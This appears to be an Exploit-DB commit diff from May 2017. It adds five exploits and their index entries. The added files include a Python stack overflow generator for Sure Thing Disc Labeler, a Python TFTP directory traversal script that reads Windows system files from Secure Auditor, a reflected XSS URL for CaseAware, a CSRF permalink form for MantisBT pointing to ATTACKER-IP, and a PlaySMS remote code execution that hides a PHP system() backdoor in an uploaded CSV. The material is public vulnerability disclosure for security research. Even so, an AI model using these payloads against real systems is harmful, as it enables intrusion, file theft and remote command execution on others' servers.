DB: 2017-05-22

5 new exploits

Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)

Secure Auditor 3.0 - Directory Traversal
KMCIS CaseAware - Cross-Site Scripting
Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery
PlaySMs 1.4 - 'import.php' Remote Code Execution

files.csv

@@ -5503,6 +5503,7 @@ id,file,description,date,author,platform,type,port
 42019,platforms/multiple/dos/42019.txt,"Adobe Flash - Out-of-Bounds Read in Getting TextField Width",2017-05-17,"Google Security Research",multiple,dos,0
 42021,platforms/windows/dos/42021.txt,"Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation",2017-05-17,"Google Security Research",windows,dos,0
 42027,platforms/multiple/dos/42027.html,"Mozilla Firefox 50 < 55 - Stack Overflow Denial of Service",2017-05-17,"Geeknik Labs",multiple,dos,0
+42040,platforms/windows/dos/42040.py,"Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)",2017-05-19,"Chance Johnson",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15524,6 +15525,7 @@ id,file,description,date,author,platform,type,port
 42025,platforms/php/remote/42025.rb,"BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)",2017-05-17,Metasploit,php,remote,80
 42026,platforms/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",xml,remote,0
 42031,platforms/win_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445
+42041,platforms/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37879,3 +37881,6 @@ id,file,description,date,author,platform,type,port
 42037,platforms/java/webapps/42037.txt,"ManageEngine ServiceDesk Plus 9.0 - Authentication Bypass",2017-05-19,ByteM3,java,webapps,0
 42038,platforms/php/webapps/42038.txt,"PlaySMS 1.4 - Remote Code Execution",2017-05-19,"Touhid M.Shaikh",php,webapps,80
 42039,platforms/hardware/webapps/42039.txt,"D-Link DIR-600M Wireless N 150 - Authentication Bypass",2017-05-19,"Touhid M.Shaikh",hardware,webapps,0
+42042,platforms/php/webapps/42042.txt,"KMCIS CaseAware - Cross-Site Scripting",2017-05-20,justpentest,php,webapps,0
+42043,platforms/php/webapps/42043.txt,"Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery",2017-05-20,hyp3rlinx,php,webapps,0
+42044,platforms/php/webapps/42044.txt,"PlaySMs 1.4 - 'import.php' Remote Code Execution",2017-05-21,"Touhid M.Shaikh",php,webapps,0

platforms/php/webapps/42042.txt

@@ -0,0 +1,27 @@
+# Exploit Title: CaseAware Cross Site Scripting Vulnerability
+# Date: 20th May 2017
+# Exploit Author: justpentest
+# Vendor Homepage: https://caseaware.com/
+# Version: All the versions
+# Contact: transform2secure@gmail.com
+# CVE : 2017-5631
+
+Source: https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle
+
+1) Description:
+An issue with respect to input sanitization was discovered in KMCIS
+CaseAware. Reflected cross site scripting is present in the user parameter
+(i.e., "usr") that is transmitted in the login.php query string. So
+bascially username parameter is vulnerable to XSS.
+
+2) Exploit:
+
+https://caseaware.abc.com:4322/login.php?mid=0&usr=admin'><a
+HREF="javascript:alert('OPENBUGBOUNTY')">Click_ME<'
+----------------------------------------------------------------------------------------
+
+3) References:
+
+https://www.openbugbounty.org/incidents/228262/
+https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle
+

platforms/php/webapps/42043.txt

@@ -0,0 +1,109 @@
+[+] Credits: John Page a.k.a hyp3rlinx	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+================
+www.mantisbt.org
+
+
+
+Product:
+=========
+Mantis Bug Tracker
+1.3.10 / v2.3.0
+
+
+MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases.
+
+
+
+Vulnerability Type:
+========================
+CSRF Permalink Injection
+
+
+
+CVE Reference:
+==============
+CVE-2017-7620
+
+
+
+Security Issue:
+================
+Remote attackers can inject arbitrary permalinks into the mantisbt Web Interface if an authenticated user visits a malicious webpage.
+
+Vuln code in "string_api.php" PHP file, under mantis/core/ did not account for supplied backslashes.
+Line: 270
+
+# Check for URL's pointing to other domains
+
+if( 0 == $t_type || empty( $t_matches['script'] ) ||
+	
+    3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) {
+
+	
+
+    return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php';
+
+}
+
+
+
+# Start extracting regex matches
+
+$t_script = $t_matches['script'];       
+$t_script_path = $t_matches['path'];
+
+
+
+
+Exploit/POC:
+=============
+<form action="http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP" method="POST">
+<script>document.forms[0].submit()</script>
+</form>
+
+OR
+
+<form action="http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0" method="POST">
+<script>document.forms[0].submit()</script>
+</form>
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: April 9, 2017
+Vendor Release Fix: May 15, 2017
+Vendor Disclosed: May 20, 2017
+May 20, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

platforms/php/webapps/42044.txt

@@ -0,0 +1,128 @@
+# Exploit Title: PlaySMS 1.4 Remote Code Execution using Phonebook import Function in import.php
+# Date: 21-05-2017
+# Software Link: https://playsms.org/download/
+# Version: 1.4
+# Exploit Author: Touhid M.Shaikh
+# Contact: http://twitter.com/touhidshaikh22
+# Website: http://touhidshaikh.com/
+# Category: webapps
+  
+1. Description
+ 
+Code Execution using import.php
+
+     We know import.php accept file and just read content 
+    not stored in server. But when we stored payload in our backdoor.csv 
+    and upload to phonebook. Its execute our payload and show on next page in field (in NAME,MOBILE,Email,Group COde,Tags) accordingly .
+
+    In My case i stored my vulnerable code  in my backdoor.csv files's Name field .
+
+    But There is one problem in execution. Its only execute in built function and variable which is used in application. 
+
+    That why the server not execute our payload directly. Now i Use "<?php $a=$_SERVER['HTTP_USER_AGENT']; system($a); ?>" in name field and change our user agent to any command which u want to execute command. Bcz it not execute <?php system("id")?> directly .
+
+Example of my backdoor.csv file content
+----------------------MY FILE CONTENT------------------------------------
+Name												Mobile	Email	Group code	Tags
+<?php $t=$_SERVER['HTTP_USER_AGENT']; system($t); ?>	22			
+
+--------------------MY FILE CONTENT END HERE-------------------------------
+
+
+ 
+ For More Details : www.touhidshaikh.com/blog/
+
+ For Video Demo : https://www.youtube.com/watch?v=KIB9sKQdEwE
+
+    
+2. Proof of Concept
+  
+Login as regular user (created user using index.php?app=main&inc=core_auth&route=register):
+ 
+Go to :
+http://127.0.0.1/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=list
+
+
+And Upload my malicious File.(backdoor.csv)
+and change our User agent.
+
+ 
+ This is Form For Upload Phonebook.
+----------------------Form for upload CSV file ----------------------
+<form action=\"index.php?app=main&inc=feature_phonebook&route=import&op=import\" enctype=\"multipart/form-data\" method=POST>
+" . _CSRF_FORM_ . "
+<p>" . _('Please select CSV file for phonebook entries') . "</p>
+<p><input type=\"file\" name=\"fnpb\"></p>
+<p class=text-info>" . _('CSV file format') . " : " . _('Name') . ", " . _('Mobile') . ", " . _('Email') . ", " . _('Group code') . ", " . _('Tags') . "</p>
+<p><input type=\"submit\" value=\"" . _('Import') . "\" class=\"button\"></p>
+</form>
+------------------------------Form ends ---------------------------
+ 
+
+ 
+-------------Read Content and Display Content-----------------------
+ 
+   case "import":
+		$fnpb = $_FILES['fnpb'];
+		$fnpb_tmpname = $_FILES['fnpb']['tmp_name'];
+		$content = "
+			<h2>" . _('Phonebook') . "</h2>
+			<h3>" . _('Import confirmation') . "</h3>
+			<div class=table-responsive>
+			<table class=playsms-table-list>
+			<thead><tr>
+				<th width=\"5%\">*</th>
+				<th width=\"20%\">" . _('Name') . "</th>
+				<th width=\"20%\">" . _('Mobile') . "</th>
+				<th width=\"25%\">" . _('Email') . "</th>
+				<th width=\"15%\">" . _('Group code') . "</th>
+				<th width=\"15%\">" . _('Tags') . "</th>
+			</tr></thead><tbody>";
+		if (file_exists($fnpb_tmpname)) {
+			$session_import = 'phonebook_' . _PID_;
+			unset($_SESSION['tmp'][$session_import]);
+			ini_set('auto_detect_line_endings', TRUE);
+			if (($fp = fopen($fnpb_tmpname, "r")) !== FALSE) {
+				$i = 0;
+				while ($c_contact = fgetcsv($fp, 1000, ',', '"', '\\')) {
+					if ($i > $phonebook_row_limit) {
+						break;
+					}
+					if ($i > 0) {
+						$contacts[$i] = $c_contact;
+					}
+					$i++;
+				}
+				$i = 0;
+				foreach ($contacts as $contact) {
+					$c_gid = phonebook_groupcode2id($uid, $contact[3]);
+					if (!$c_gid) {
+						$contact[3] = '';
+					}
+					$contact[1] = sendsms_getvalidnumber($contact[1]);
+					$contact[4] = phonebook_tags_clean($contact[4]);
+					if ($contact[0] && $contact[1]) {
+						$i++;
+						$content .= "
+							<tr>
+							<td>$i.</td>
+							<td>$contact[0]</td>
+							<td>$contact[1]</td>
+							<td>$contact[2]</td>
+							<td>$contact[3]</td>
+							<td>$contact[4]</td>
+							</tr>";
+						$k = $i - 1;
+						$_SESSION['tmp'][$session_import][$k] = $contact;
+					}
+				}
+ 
+------------------------------code ends ---------------------------
+ 
+
+Bingoo.....
+
+ 
+*------------------My Friends---------------------------*
+|Pratik K.Tejani, Rehman, Taushif,Charles Babbage  |
+*---------------------------------------------------*

platforms/windows/dos/42040.py

@@ -0,0 +1,33 @@
+# Exploit Title: Sure Thing Disc Labeler - Stack Buffer Overflow (PoC)
+# Date: 5-19-17
+# Exploit Author: Chance Johnson  (albatross@loftwing.net)
+# Vendor Homepage: http://www.surething.com/
+# Software Link: http://www.surething.com/disclabeler
+# Version: 6.2.138.0
+# Tested on: Windows 7 x64 / Windows 10
+#
+# Usage: 
+#    Open the project template generated by this script.
+#    If a readable address is placed in AVread, no exception will be thrown
+#    and a return pointer will be overwritten giving control over EIP when
+#    the function returns.
+
+header  = '\x4D\x56\x00\xFF\x0C\x00\x12\x00\x32\x41\x61\x33\x08\x00\x5E\x00'
+header += '\x61\x35\x41\x61\x36\x41\x61\x37\x41\x61\x38\x41\x61\x39\x41\x62'
+header += '\x30\x41\x62\x31\x41\x62\x32\x41\x62\x33\x41\x62\x34\x41\x62\x35'
+header += '\x41\x62\x36\x41\x78\x37\x41\x62\x38\x41\x62\x39\x41\x63\x30\x41'
+header += '\x0C\x00\x41\x63\x78\x1F\x00\x00\x41\x63\x34\x41\x63\x35\x41\x63'
+
+junk1  =   'D'*10968
+EIP    =   'A'*4            # Direct RET overwrite
+junk2  =   'D'*24
+AVread =   'B'*4  			# address of any readable memory
+junk3  =   'D'*105693
+
+buf = header + junk1 + EIP + junk2 + AVread + junk3
+
+print "[+] Creating file with %d bytes..." % len(buf)
+
+f=open("exp.std",'wb')
+f.write(buf)
+f.close()

platforms/windows/remote/42041.txt

@@ -0,0 +1,99 @@
+[+] Credits: John Page aka HYP3RLINX	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+====================
+www.secure-bytes.com
+
+
+
+Product:
+=====================
+Secure Auditor - v3.0
+
+Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases
+and Cisco devices.
+
+
+
+Vulnerability Type:
+===================
+Directory Traversal
+
+
+
+CVE Reference:
+==============
+CVE-2017-9024
+
+
+
+Security Issue:
+================
+Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a
+Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname.
+
+
+
+
+Exploit/POC:
+=============
+import sys,socket
+
+print 'Secure Auditor v3.0 / Cisco Config Manager'
+print 'TFTP Directory Traversal Exploit'
+print 'Read ../../../../Windows/system.ini POC'
+print 'hyp3rlinx'
+
+HOST = raw_input("[IP]> ")
+FILE = '../../../../Windows/system.ini' 
+PORT = 69                                        
+ 
+PAYLOAD = "\x00\x01"                #TFTP Read 
+PAYLOAD += FILE+"\x00"              #Read system.ini using directory traversal
+PAYLOAD += "netascii\x00"           #TFTP Type
+ 
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+s.sendto(PAYLOAD, (HOST, PORT))
+out = s.recv(1024)
+s.close()
+
+print "Victim Data located on : %s " %(HOST)
+print out.strip()
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+==================================
+Vendor Notification: May 10, 2017
+No replies
+May 20, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx